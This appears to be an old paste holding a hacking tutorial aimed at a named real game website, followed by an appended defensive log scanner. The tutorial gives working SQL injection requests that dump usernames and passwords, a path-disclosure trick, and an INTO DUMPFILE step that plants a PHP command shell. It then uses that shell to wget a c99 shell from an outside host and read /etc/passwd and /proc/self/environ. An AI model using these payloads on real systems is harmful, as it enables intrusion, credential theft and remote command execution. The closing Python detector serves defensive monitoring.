Avatar_Fearless

asd

Aug 31st, 2012
And then, while we are at it, a shell upload. First we will need the path, so that we know where we are uploading to.
So:
SQLi = http://www.gamesinaflash.com/play.php?id=37%27
Path Disclosure : Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gamesinaflash/public_html/play.php on line 14
Often this is hard to find. For example, TheJust, in the one you gave there was this thing that the path was not shown, but we will use [] to find it. Full Path Disclosure does not work on every system. In the one you gave it was like this:
www.gamesinaflash.com/play.php?id=-37 UNION SELECT 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users
If we use Path Disclosure, then we attach [] to $_GET['id'] like this:
www.gamesinaflash.com/play.php?id[]=-37 UNION SELECT 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users
As you can see, it showed up again:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gamesinaflash/public_html/play.php on line 14
What we need here is
[code]/home/gamesinaflash/public_html/play.php[/code]
You all know that /www/ or /public_html/ is one of the main folders.
That is, whatever you drop there will be visible on the site. For example, if you write /home/gamesinaflash/public_html/asd.php it will come up as site.com/asd.php. A lot could be written about this. Now back to the topic. The part we needed was this:
[code]/home/gamesinaflash/public_html/[/code]
Now we know which folders exist. Next we will use <? echo system $_GET['cmd'] ?>. So, we needed this Full Path Disclosure, or rather the path, and we found it (/home/gamesinaflash/public_html/); now let's upload.
[code]
www.gamesinaflash.com/play.php?id=-37 UNION SELECT 1,2,3,'<? echo system $_GET['cmd']; ?>,5,6,7,8,9,10,11,12,13,14,15,16,17,18 into dumpfile '/home/gamesinaflash/public_html/shellinadi.php'
[/code]
Here a file named "shellinadi.php" is created, and it is used as SYSTEM. Then we execute commands with shellinadi.php?cmd=ls, and then [code]shellinadi.php?cmd=wget http://c99.gen.tr/c99.txt -O shell.php[/code]
At this point a file named shell.php is created and we include it into the site. During this SQL it is possible to pull /etc/passwd, for example:
[code]root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin[/code]
Then, I don't know, PSE [code]www.website.com/shellinadi.php?cmd=../../../../../proc/self/environ[/code]
Then something like this will come up in front of us:
[code]DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80[/code]
Here the shellinadi.php we created now shows the source of a system file, like a terminal. As I said, it is a kind of Inclusion, more precisely Local File Inclusion. I wanted to show it live on this site, but it would need to be bypassed and I have no time for that, thanks =) May the newcomers benefit.
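As an added defender-side example (not part of the original paste), the following Python scans Apache-style access-log lines for the request patterns this walkthrough relies on: the id[]= full-path-disclosure probe, UNION SELECT with INTO DUMPFILE/OUTFILE, cmd= parameters and ../ traversal to /proc/self/environ. The log lines, client IP and paths are constructed; the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (no real server or host): one benign
# request, one id[]= path-disclosure probe, one INTO DUMPFILE write attempt,
# one cmd= call and one traversal read of /proc/self/environ.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Aug/2012:10:00:01 +0000] "GET /play.php?id=37 HTTP/1.1" 200 5120
203.0.113.5 - - [31/Aug/2012:10:00:02 +0000] "GET /play.php?id[]=-37%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 210
203.0.113.5 - - [31/Aug/2012:10:00:03 +0000] "GET /play.php?id=-37%20UNION%20SELECT%201,2,'x'%20into%20dumpfile%20'/home/site/public_html/s.php' HTTP/1.1" 200 210
203.0.113.5 - - [31/Aug/2012:10:00:04 +0000] "GET /s.php?cmd=ls HTTP/1.1" 200 120
203.0.113.5 - - [31/Aug/2012:10:00:05 +0000] "GET /s.php?cmd=../../../../../proc/self/environ HTTP/1.1" 200 900
"""

# (label, pattern) pairs applied to the URL-decoded request path; order matters
# only for the order of labels in the result.
RULES = [
    ("sqli_union", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("mysql_file_write", re.compile(r"\binto\s+(dump|out)file\b", re.I)),
    ("fpd_array_param", re.compile(r"[?&][a-z_]+\[\]=", re.I)),
    ("path_traversal", re.compile(r"\.\./")),
    ("proc_self_environ", re.compile(r"proc/self/environ", re.I)),
    ("cmd_param", re.compile(r"[?&]cmd=", re.I)),
]

# Common Log Format: ip ident user [timestamp] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_log(text):
    """Return (ip, raw_path, [labels]) for every request that matches a rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not Common Log Format
        # Decode twice so double-encoded payloads (%252e%252e/) are not missed.
        decoded = unquote_plus(unquote_plus(m.group("path")))
        labels = [label for label, pat in RULES if pat.search(decoded)]
        if labels:
            hits.append((m.group("ip"), m.group("path"), labels))
    return hits


if __name__ == "__main__":
    for ip, path, labels in scan_log(SAMPLE_LOG):
        print(ip, ",".join(labels), path)
```

The benign first line produces no hit; a chain of id[]= probe, INTO DUMPFILE write and cmd= requests from one client within seconds is the sequence to alert on.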